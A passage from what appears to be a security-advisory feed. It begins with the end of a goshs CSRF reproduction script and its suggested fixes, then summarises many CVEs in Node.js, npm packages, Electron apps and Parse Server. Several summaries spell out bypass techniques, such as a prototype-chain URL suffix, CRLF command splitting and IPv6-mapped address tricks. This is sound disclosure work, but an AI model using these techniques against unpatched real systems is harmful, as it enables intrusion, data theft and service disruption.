"$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.

Prototype pollution in LangSmith JavaScript/TypeScript SDK (langsmith) versions prior to 0.5.18 allows remote attackers to pollute Object.prototype via the createAnonymizer() API by supplying malicious constructor.prototype keys, bypassing an incomplete __proto__ filter. The vulnerability affects all objects in the Node.js process and can lead to information disclosure and integrity violations. No public exploit code or active exploitation has been confirmed at time of analysis.

Remote code execution affects Axios HTTP client library versions prior to 1.15.0 via gadget chain escalation of prototype pollution vulnerabilities in third-party dependencies. Unauthenticated network attackers can exploit this chaining mechanism to achieve full remote code execution or cloud compromise through AWS IMDSv2 bypass. Critical severity (CVSS 10.0) with scope change indicates containment boundary violation. No public exploit identified at time of analysis.

Arbitrary code execution in OpenClaw versions prior to 2026.3.24 enables local attackers to execute malicious code during npm package installation by crafting a malicious .npmrc file that overrides the git executable. When npm install runs in the staged package directory with git dependencies, the attacker-controlled .npmrc configuration triggers execution of arbitrary programs specified by the attacker. Exploitation requires user interaction to install the malicious plugin or hook locally. No public exploit identified at time of analysis.

Authenticated Standard Registry users can execute arbitrary Node.js code in Hashgraph Guardian ≤3.5.0 through unsandboxed JavaScript evaluation in the Custom Logic policy block worker, enabling credential theft and privilege escalation. The vulnerability allows importing native Node.js modules to read container filesystem contents, extract RSA private keys and JWT signing secrets from environment variables, and forge administrator authentication tokens. Despite low EPSS (0.12%) indicating minimal widespread exploitation probability, the authenticated RCE path to total system compromise warrants immediate patching for deployments using Custom Logic policy features.

Hostname normalization bypass in Axios (JavaScript HTTP client) versions prior to 1.15.0 allows unauthenticated remote attackers to circumvent NO_PROXY configuration rules and force HTTP requests through configured proxies. Attackers can exploit malformed loopback addresses (localhost. with trailing dot, [::1] IPv6 literals) to bypass proxy restrictions and conduct Server-Side Request Forgery (SSRF) attacks against protected internal services. Publicly available exploit code exists. Affects all Axios implementations in Node.js and browser environments with NO_PROXY configurations.

Command injection in basic-ftp npm package v5.2.0 allows unauthenticated remote attackers to inject arbitrary FTP protocol commands via CRLF sequences in file path parameters. Affected methods include cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). Inadequate input sanitization in protectWhitespace() combined with direct socket writes enables attackers to split single FTP commands into multiple commands, leading to unauthorized file deletion, directory manipulation, file exfiltration, or session hijacking. Vendor-released patch available in version 5.2.1. No public exploit identified at time of analysis. EPSS unavailable.

Path traversal in liquidjs 10.25.0 allows local file disclosure when renderFile() or parseFile() receives absolute paths or traversal sequences, despite the root parameter being documented as a sandbox boundary. An attacker controlling template filenames passed to these APIs can read arbitrary files accessible to the Node.js process, such as /etc/hosts or sensitive configuration files. The vulnerability affects liquidjs versions prior to 10.25.5; a vendor-released patch is available. No public exploit code or active exploitation has been identified at the time of analysis.

Authentication bypass in LobeHub webapi allows unauthenticated attackers to forge X-lobe-chat-auth headers using a publicly disclosed XOR key, gaining unauthorized access to protected routes including chat, model listing, and image generation endpoints. The vulnerability affects LobeHub versions up to 2.1.47 and has a confirmed proof-of-concept; however, the CVSS vector indicates PR:L (low privilege required), suggesting the advertised attack may require some initial authentication. Vendor-released patch version 2.1.48 is available.

The replace filter in LiquidJS (Node.js npm package) fails to correctly account for memory usage when memoryLimit is enabled, allowing remote attackers to bypass DoS protections with approximately 2,500x memory amplification by crafting templates where the replace operation produces quadratically larger output than the charged memory cost. Deployments with memoryLimit explicitly configured to protect against untrusted template input can suffer out-of-memory crashes; patch available in v10.25.3.

Denial of service in Axios HTTP/2 client before version 1.13.2 allows unauthenticated remote attackers to crash Node.js applications through malicious HTTP/2 server responses that trigger state corruption during concurrent session closures. The vulnerability exploits a control flow error in session cleanup logic with high attack complexity, making real-world exploitation require specific server-side conditions but posing significant risk to applications relying on HTTP/2.

IPv4 access control bypass in Hono middleware allows IPv4-mapped IPv6 addresses (e.g., ::ffff:127.0.0.1) to bypass IPv4-based ipRestriction() rules due to failure to canonicalize addresses before matching. Denied IPv4 clients can circumvent access restrictions in Node.js dual-stack environments by presenting as IPv6-formatted addresses, and legitimate IPv4 clients may be incorrectly rejected when allowlists are used. No public exploit code identified at time of analysis, but the vulnerability enables straightforward authentication bypass with minimal complexity.

Remote code execution in SiYuan desktop client (Electron-based) versions prior to 3.6.4 allows authenticated attackers to execute arbitrary code on victim systems via malicious notes propagated through workspace sync. Stored XSS in table caption fields escalates to RCE due to nodeIntegration enabled and contextIsolation disabled in Electron renderer. CVSS 9.0 (Critical) with scope change indicates escape from browser context. No active exploitation confirmed (not in CISA KEV). EPSS score 0.14% suggests low current exploitation probability. Vendor-released patch: version 3.6.4.

Parse Server versions prior to 9.8.0-alpha.7 and 8.6.75 expose protected session fields to authenticated users via the GET /sessions/me endpoint, bypassing the protectedFields server configuration that should restrict access to sensitive data. An authenticated attacker can retrieve their own session's protected fields in a single request, whereas the equivalent GET /sessions and GET /sessions/:objectId endpoints correctly enforce field-level access controls. This information disclosure vulnerability affects any Parse Server deployment where administrators have configured protected fields on the _Session class and expects those fields to remain confidential from users.

Parse Server versions prior to 9.8.0-alpha.6 and 8.6.74 leak valid usernames through timing side-channel attacks on the login endpoint, allowing unauthenticated attackers to enumerate existing user accounts by measuring response latency differences between non-existent users and incorrect password attempts. The vulnerability exploits inadequate constant-time comparison in password verification, enabling account enumeration without authentication and with moderate attack complexity.

HTTP request smuggling and denial of service in Tinyproxy through 1.11.3 allows unauthenticated remote attackers to cause backend worker exhaustion and bypass request inspection controls. The vulnerability stems from case-sensitive Transfer-Encoding header parsing that violates RFC 7230, enabling attackers to send 'Transfer-Encoding: Chunked' (capitalized) to desynchronize Tinyproxy's request state from RFC-compliant backends like Node.js and Nginx. No public exploit identified at time of analysis, though EPSS data not available and technical details are publicly documented in GitHub issue #604. Authentication requirements not confirmed from available data, but CVSS vector indicates network-accessible attack requiring no privileges.

Regular Expression Denial of Service (ReDoS) in @hapi/content npm package versions through 6.0.0 allows unauthenticated remote attackers to crash Node.js processes via a single HTTP request containing maliciously crafted Content-Type or Content-Disposition header values. Three regular expressions used for header parsing contain catastrophic backtracking patterns that can consume unbounded CPU resources. Vendor-released patch available via GitHub (PR #38). No public exploit code identified at time of analysis, though the attack vector is straightforward for any attacker with HTTP request capabilities.

SandboxJS versions 0.8.35 and below allow untrusted sandboxed code to leak internal interpreter scope objects through the `new` operator, exposing raw Prop wrappers that reference the host's global variable storage (scope.allVars). An attacker controlling code execution within the sandbox can extract this scope object and modify variables in the sandbox hierarchy, though prototype chain and code evaluation remain protected. Vendor-released patch available; no active KEV status or public exploit code confirmed.

Denial of service in @nyariv/sandboxjs through unbounded recursion in the parser allows remote attackers to crash Node.js processes by submitting deeply nested expressions (approximately 2000 nested parentheses or brackets), triggering a RangeError that terminates the application. All public API methods (Sandbox.parse, Sandbox.compile, Sandbox.compileAsync, Sandbox.compileExpression, Sandbox.compileExpressionAsync) are vulnerable with no input validation or depth limiting. A proof-of-concept demonstrating the crash exists; no public active exploitation has been reported at the time of analysis.

Sandbox escape in SandboxJS npm package allows unauthenticated remote attackers to mutate host JavaScript global objects (Math, JSON, etc.) and persist malicious code across sandbox instances. The vulnerability bypasses intended global-write protections by exploiting an exposed constructor callable path (this.constructor.call), enabling arbitrary property injection into host runtime globals. Exploitation probability is HIGH (EPSS not available for recent CVE), with publicly available exploit code demonstrating both immediate host contamination and cross-execution persistence. Critical impact: attacker-controlled globals can hijack application control flow when host code consumes mutated built-ins, escalating to arbitrary command execution when chained with application sinks like execSync().

Path traversal in Budibase plugin upload endpoint allows Global Builders to delete arbitrary directories and write files to any accessible filesystem path. Affecting all versions prior to 3.33.4, attackers with high privileges (Global Builder role) can exploit unsanitized filename handling in POST /api/plugin/upload to execute directory traversal attacks remotely with low complexity. CVSS 8.7 (High) with scope change indicates potential container escape or cross-tenant impact. No public exploit identified at time of analysis, though the attack vector is straightforward given the documented path traversal mechanism.

Context isolation bypass in Electron applications enables privilege escalation when VideoFrame objects are bridged to the main world. Attackers with XSS capabilities can leverage improperly bridged WebCodecs API VideoFrame objects to escape the isolated context and access Node.js APIs exposed in preload scripts. CVSS 8.4 (High) with network attack vector requiring high complexity and user interaction. No public exploit identified at time of analysis, though proof-of-concept development is feasible given the detailed vendor disclosure.

Electron's nodeIntegrationInWorker webPreference fails to properly isolate Node.js integration in worker contexts across certain process-sharing configurations, allowing workers in frames explicitly configured with nodeIntegrationInWorker: false to unexpectedly gain Node.js capabilities. Only applications that explicitly enable nodeIntegrationInWorker are affected. The vulnerability carries a CVSS score of 6.8 and permits information disclosure and code execution in affected contexts, with no public exploit identified at time of analysis.

Supply chain compromise of @usebruno/cli (Bruno API testing tool) deployed a cross-platform Remote Access Trojan via malicious axios dependency versions 1.14.1 and 0.30.4 on npm during a 3-hour window (00:21-03:30 UTC, March 31, 2026). Unauthenticated remote attackers gained full system compromise including credential exfiltration and persistent RAT installation on affected developer workstations. No public exploit code required as the malicious payload executed automatically via npm postinstall

Remote code execution in Replicator npm package version 1.0.5 allows unauthenticated attackers to execute arbitrary code by supplying malicious serialized objects that the library deserializes without validation. Applications using Replicator to process untrusted input are vulnerable to immediate compromise; no public exploit code availability or active exploitation status is confirmed at time of analysis, but the unauthenticated attack vector and ease of object deserialization attacks suggest practical exploitability.

File Browser's self-registration mechanism grants arbitrary shell command execution to unauthenticated attackers when administrators enable signup alongside server-side execution. The signupHandler inherits Execute permissions and Commands lists from default user templates but only strips Admin privileges, allowing newly registered users to immediately execute arbitrary commands via WebSocket with the process's full privileges. Vendor patch available. EPSS data not provided, but the specific configuration requirement (signup + enableExec + Execute in defaults) significantly narrows the attack surface despite the network-accessible, unauthenticated attack vector (CVSS 8.1 High). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis beyond the detailed proof-of-concept in the advisory.

Remote code execution in SiYuan desktop application (versions prior to 3.6.2) allows unauthenticated remote attackers to execute arbitrary code with full operating system privileges through CORS misconfiguration. A malicious website can inject JavaScript into the Electron-based application's Node.js context via the permissive API (Access-Control-Allow-Origin: * with Access-Control-Allow-Private-Network: true), which executes with OS-level access when the user next opens SiYuan's interface. No public exploit identified at time of analysis, though CVSS 9.6 (Critical) reflects network-accessible attack vector with low complexity requiring only user interaction (visiting malicious site while SiYuan runs). EPSS data not provided, but the combination of Electron framework exploitation, RCE impact, and trivial attack complexity suggests elevated real-world risk for desktop users.

Parse Server versions prior to 8.6.71 and 9.7.1-alpha.1 allow HTTP Range requests to bypass the afterFind trigger and its validators when downloading files from streaming-capable storage adapters like GridFS, enabling unauthorized access to protected files that should be restricted by authentication or authorization logic. This authentication bypass affects all deployments using affected versions with file protection policies enforced via afterFind triggers.

Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.

Authenticated users in Parse Server prior to versions 8.6.69 and 9.7.0-alpha.14 can bypass immutability protections on session fields by submitting null values in PUT requests to the session update endpoint, allowing indefinite session validity and circumventing configured session expiration policies. The vulnerability requires valid authentication credentials to exploit and has been patched in the specified versions.

GraphQL query complexity validator in Parse Server allows remote denial-of-service via crafted queries with binary fan-out fragment spreads, blocking the Node.js event loop for seconds with a single unauthenticated request. Parse Server versions prior to 8.6.68 and 9.7.0-alpha.12 are affected when requestComplexity.graphQLDepth or requestComplexity.graphQLFields options are enabled. EPSS data not provided; no public exploit identified at time of analysis. CVSS 8.2 (High) reflects network-accessible attack with low complexity requiring no privileges, causing high availability impact.

Parse Server Cloud Function validator bypass allows unauthenticated remote attackers to execute protected server-side functions by exploiting prototype chain traversal. Attackers append 'prototype.constructor' to Cloud Function URLs to circumvent access controls (requireUser, requireMaster, custom validators), enabling unauthorized execution of backend business logic. Affects Parse Server versions prior to 8.6.67 and 9.7.0-alpha.11. No public exploit identified at time of analysis, though the attack vector is network-accessible with low complexity (CVSS:4.0 AV:N/AC:L/PR:N). The vulnerability stems from inconsistent prototype chain resolution between handler and validator stores (CWE-863: Incorrect Authorization).

Uncaught TypeError in Node.js HTTP server crashes applications when clients send specially crafted `__proto__` headers and code accesses `req.headersDistinct`. The exception occurs synchronously in a property getter, bypassing standard error handling mechanisms and causing immediate service disruption. Affects Node.js versions 20.x, 22.x, 24.x, and 25.x with CVSS 7.5 (High). EPSS data not available; no public exploit identified at time of analysis, though exploitation requires only sending a malformed HTTP header with no authentication (CVSS:3.0/AV:N/AC:L/PR:N/UI:N).

Unix Domain Socket operations in Node.js 25.x bypass permission model enforcement, allowing local processes to create IPC endpoints and communicate with other processes when run with --permission flag but without --allow-net. An authenticated local attacker can establish inter-process communication channels that circumvent the intended network isolation boundary, resulting in information disclosure and potential privilege escalation within the same host. No public exploit code identified at time of analysis, though the vulnerability affects an experimental permission enforcement feature.

Node.js Permission Model enforcement in versions 20.x, 22.x, 24.x, and 25.x fails to validate read permissions for fs.realpathSync.native(), allowing local authenticated processes running under --permission with restricted --allow-fs-read to enumerate filesystem paths, check file existence, and resolve symlink targets outside permitted directories. This information disclosure vulnerability bypasses sandbox restrictions intentionally configured by administrators and affects multiple stable and current Node.js release series.